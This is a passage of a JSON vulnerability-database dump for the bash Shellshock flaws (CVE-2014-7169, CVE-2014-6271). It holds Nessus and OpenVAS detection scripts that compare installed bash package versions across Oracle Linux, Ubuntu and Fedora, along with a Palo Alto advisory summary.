(isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:01:29", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "modified": "2020-01-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-3078.NASL", "href": "https://www.tenable.com/plugins/nessus/77894", "published": "2014-09-26T00:00:00", "title": "Oracle Linux 4 : bash (ELSA-2014-3078)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3078.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77894);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3078)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004482.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:01:29", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "modified": "2020-01-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-3079.NASL", "href": "https://www.tenable.com/plugins/nessus/77953", "published": "2014-09-29T00:00:00", "title": "Oracle Linux 4 : bash (ELSA-2014-3079)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3079.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77953);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3079)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.3.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T02:12:05", "bulletinFamily": "scanner", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the\npatch for CVE-2014-7169 didn", "modified": "2020-01-02T00:00:00", "id": "UBUNTU_USN-2363-2.NASL", "href": "https://www.tenable.com/plugins/nessus/77898", "published": "2014-09-26T00:00:00", "title": "Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77898);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/09/19 12:54:30\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the\npatch for CVE-2014-7169 didn't get properly applied in the Ubuntu\n14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2363-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2019 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T02:12:05", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "UBUNTU_USN-2363-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77897", "published": "2014-09-26T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77897);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/09/19 12:54:30\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2363-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2019 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:01:29", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "modified": "2020-01-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-3077.NASL", "href": "https://www.tenable.com/plugins/nessus/77893", "published": "2014-09-26T00:00:00", "title": "Oracle Linux 5 : bash (ELSA-2014-3077)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3077.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77893);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3077)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004483.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2019-05-29T23:19:21", "bulletinFamily": "software", "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "modified": "2014-09-25T00:00:00", "published": "2014-09-24T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:13", "bulletinFamily": "scanner", "description": "Check the version of bash", "modified": "2019-03-15T00:00:00", "published": "2014-10-06T00:00:00", "id": "OPENVAS:1361412562310868358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868358", "title": "Fedora Update for bash FEDORA-2014-12202", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-12202\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:22 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-12202\");\n script_tag(name:\"summary\", value:\"Check the version of bash\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", 